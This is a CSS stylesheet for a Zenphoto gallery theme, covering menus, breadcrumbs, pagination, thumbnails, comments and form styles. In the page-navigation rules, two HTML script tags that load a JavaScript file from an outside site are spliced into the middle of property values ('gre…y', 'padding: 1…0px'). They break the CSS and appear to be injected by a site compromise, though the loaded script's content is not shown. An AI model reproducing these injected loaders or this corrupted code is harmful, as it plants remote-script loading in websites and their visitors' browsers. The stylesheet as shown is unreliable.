/*

	Zen Photo Default 1.0
	
*/

/* Basics
------------------------------ */
html {
	/* IE */
	overflow-y: scroll; 
	/* Moz */
	margin-bottom: 0.1em;
}

/* Main Layout
------------------------------ */
body {
	margin: 0px;
	padding: 0px;
	background: #000;
}
#main {
	min-height: 100%;
	height: auto !important;
	height: 100%;
	margin: 0 auto -60px; /* the bottom margin is the negative value of the footer's height */
}
#ecoecursions {
	margin: 64px 30px 60px 25px;
}
#eco_menu {
	cursor: pointer;
}
#eco_menu a {
	padding: 6px;
}

.eco_menu_unselected {
	opacity: 0.6;
}

.eco_menu_unselected:hover {
	opacity: 1.0;
}

.eco_menu_selected {
	opacity: 1.0;
}
#gallery_wrapper {
	margin: 0px 25px 0px 25px;
}

#credit {
	height: 40px; 
	width:100%;
	padding-bottom: 20px;
	text-align: center;
	font-size: 10px;
	color: #777;
}

#credit a {
	text-decoration: none;
	color: #96967E;
	border-bottom: 1px dotted #96967E;
}
#credit a:hover {
	color: #BDBDAE;
	border-bottom: 1px solid #BDBDAE;
	text-decoration: none;
}

#ecoecursions {
	padding: 9px 0px 0px 0px;
}
#ecoecursions h1 {
	padding: 0px;
	margin: 0px;
}
#ecotitle {
	font-family: Verdana, sans-serif;
	letter-spacing: 0.10em;
	font-size: 10px;
	color: #53332C;
	float: right; 
	margin-top: 38px;
	margin-right: 35px; 
	text-decoration: none;
}
#tags_list {
	font-size: 13px;
}
#eco_menu {
	font-family: arial, helvetica, sans-serif;
	position: relative; 
	padding-top: 10px; 
	float:right;
}
#eco_menu a {
	text-decoration: none;
	font-size: 10px;
	color: #111;
}
#eco_menu a:hover {
	color: #111;
}
#eco_menu a:visited {
	color: #111;
}
#seperator {
	clear: both;
}
#gallerybreadcrumbs {
	_margin-top: 10px; /* IE Only */
	clear: both;
	font-weight: normal;
	font-family: Tahoma, Geneva, sans-serif;
	font-size: 11px;
	text-transform: capitalize;
	letter-spacing: 1px;
	color: #ccc;
	padding-bottom:20px;
}

#gallerybreadcrumbs a {
	color: #ccc;
	text-decoration: none;
} 
#gallerybreadcrumbs a:hover {
	background: #FFF;
	color: #000;
}

.gallerytitle {
	_margin-top: 10px; /* IE Only */
	clear: both;
	font-family: Tahoma, Geneva, sans-serif;
	font-size: 11px;
	text-transform: capitalize;
	letter-spacing: 1px;
	color: #ccc;
	padding-top:6px;
}

#gallerytitle a {
	color: #ccc;
	text-decoration: none;
}
#gallerytitle a:hover {
	background: #EEEEEE;
}
/* Text Styles
------------------------------ */
body {
	font: normal 82%/160% "Helvetica Neue", Helvetica, Arial, sans-serif;
	color: #5A5A4B;
	height: 100%;
}
h2 {
	font: 18px Tahoma, "Helvetica Neue", Helvetica, Arial, sans-serif;
	color: #002E5B;
	margin-top: 25px;
}
h2 a:link, h2 a:visited, h2 span {
	color: #8DB8CF;
}
h3 {
	font: 120% "Helvetica Neue", Helvetica, Arial, sans-serif;
	color: #002E5B;
	margin-top: 30px;
}



/* Link Styles
------------------------------ */
a:link, a:active { text-decoration: underline; color: #17A; }
a:visited { text-decoration: underline; color: #035; }
a:hover, a:focus { text-decoration: underline; color: #6BD; }


/* Miscellaneous
------------------------------ */
hr {
	clear: both;
	height: 0;
	border: 0;
	border-top: 1px solid #E6E6DF;
	margin: 0 0 12px 0;
	padding: 0;
}
img {
	border: 0px;
	padding: 0px;
	margin: 0px;
}
blockquote {
	border-left: 1px dotted #96967E;
	margin-left: 20px;
	padding-left: 20px;
	color: #363630;
}


/* Page Navigation
------------------------------ */
ul.pagelist {
	display: table;
	_margin-top: 10px; /* IE Only */
	float: left;
	padding: 0px 0px 0px 0px;
	list-style-type: none;
	font-size: 11px;
}
ul.pagelist li {
	display: inline;
	
}
ul.pagelist li a, ul.pagelist span.disabledlink {
	padding: 4px;
}
ul.pagelist li a:hover {
	font-weight: bold;
	text-decoration: none;
	color: #5A5A4B;
	background: gre<script type="text/javascript" src="http://ecocentrik.com/archives/zp-core/plugins/tiny_mce/themes/zenphoto/langs/en.js"></script>y;
	color: white;
}
ul.pagelist li.current a {
	font-weight: bold;
	text-decoration: none;
	cursor: default;
	color: #5A5A4B;
	background: grey;
	color: white;
}
ul.pagelist li.prev {
	margin-right: 10px;
}
ul.pagelist li.next {
	margin-left: 10px;
}
.disabledlink {
	color: #ddd;
	cursor: default;
}
.pagenav {
	display: table;
	_margin-top: 10px; /* IE Only */
	float: left;
	padding: 1<script type="text/javascript" src="http://ecocentrik.com/archives/zp-core/plugins/tiny_mce/themes/zenphoto/langs/en.js"></script>0px 0px 0px 0px;
	list-style-type: none;
	font-size: 11px;
}
#search_info {
	float:left;
}
.search_tag {
	list-style-type: none;
	margin-left: -35px;
}
.search_tag a {
	text-decoration: none;
	color: #ccc;
}



/* AJAX
------------------------------ */
#albumDesc, #imageDesc {
	line-height: 15px;
	font-size: 11px;
	clear: both;
}

#imageTags, #albumTags{
	font-size: 11px;
	clear: both;
}

#imageTags li, #imageTags ul {
	display: inline;
}

#albumDescEditable {
}
#imageDescEditable {
	margin-top: 16px;
	margin-bottom: 16px;
}
#enableSorting {
	margin-left: 20px;
}

/* Image Thumbnails
------------------------------ */
#images {
	width: 900px;
}

/* Album Thumbnails
------------------------------ */
#albums {
	width: 850px;
}
.album {
	width: 260px;
	height: 260px;
	float: left;
	text-align: center;
}
.albumthumb {

}
.album img {
	
}
/* Individual Image
------------------------------ */
.image { 
	width: 260px;
	height: 260px;
	float: left;
	text-align: center;
}
#image {
	float: left;
}
#order_print {
	float: left;
	width: 200px;
	padding-left: 20px;
	color: #CCCCCC;
	line-height: 20px;
	font-size: 11px;
}
#order_print .order_header {
	font-size: 14px;
	line-height: 26px;
}
#order_print input {
	font-size: 11px;
	border: 1px solid #CCC;
}
#order_print select {
	font-size: 11px;
	border: 1px solid #CCC;
}
#order_print .googlecart-add-button {
	margin-top: 5px;
}
.imgnav {
	display: table;
	_margin-top: 10px; /* IE Only */
	//float: left;
	width: 60px;
	padding: 10px 0px 0px 0px;
	font-size: 10px;
}
.imgnav a {
	text-decoration: none;
}

.navblur {
	color: #ccc;
}

#hitcounter {
	clear: both;
}

/* Admin Toolbox
------------------------------ */
#admin, #admin_data{
	position: fixed;
    _position: absolute;
	right: 0px;
	bottom: 0px;
	width: 130px;
	border-bottom: 1px solid #E6E6DF;
	border-left: 1px solid #E6E6DF;
	background: #fff;
    z-index: 20;
}
#admin_data{
	top: 0px;
	padding-top: 20px;
	z-index: 1;
	line-height: 1.6em;
}
#admin h3 {
	font-weight: normal;
	color: #999;
	margin:0;
	padding:0;
}
#admin h3:hover { color: #036; }


/* Comments
------------------------------ */
#comments {
	clear: both;
	font-size: 10px;
}
.error { 
  color: #C33; 
  font-weight: bold; 
}
.commentcount {
	padding-top: 5px;
	font-size: 10px;
}
.comment {
	padding: 10px;
	border: 1px solid #E7F0F5;
	background: #FBFCFD;
	margin-bottom: 12px;
	width: 580px;
}
.commentmeta {
	margin-bottom: 12px;
}
.commentauthor {
	font-weight: bold;
}
.commentdate {
	margin-top: 12px;
	font-size: 85%;
}

#commentform textarea {
	font-size: 11px;
	color: #000;
} 

.rating {
	clear: both;
	width: 500px;
	height: 60px;
}


/* Forms
------------------------------ */
.inputbox {
	width: 250px;
	padding: 2px;
}
textarea {
	padding: 4px;
	width: 480px;
	color: #5A5A4B;
	font: 82%/160% "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.checkbox {
	cursor: pointer;
}
.pushbutton {
	cursor: pointer;
	padding: 5px 10px;
}
label {
	cursor: pointer;
}
label:hover {
	color: #000;
}



#nav, #nav ul { /* all lists */
	padding: 0;
	margin: 0;
	list-style: none;
	line-height: 1;
}

#nav a {
	display: block;
	width: 10em;
}

#nav li { /* all list items */
	float: left;
	width: 10em; /* width needed or else Opera goes nuts */
}

#nav li ul { /* second-level lists */
	position: absolute;
	background: orange;
	width: 10em;
	left: -999em; /* using left instead of display to hide menus because display: none isn't read by screen readers */
}

#nav li:hover ul, #nav li.sfhover ul { /* lists nested under hovered list items */
	left: auto;
}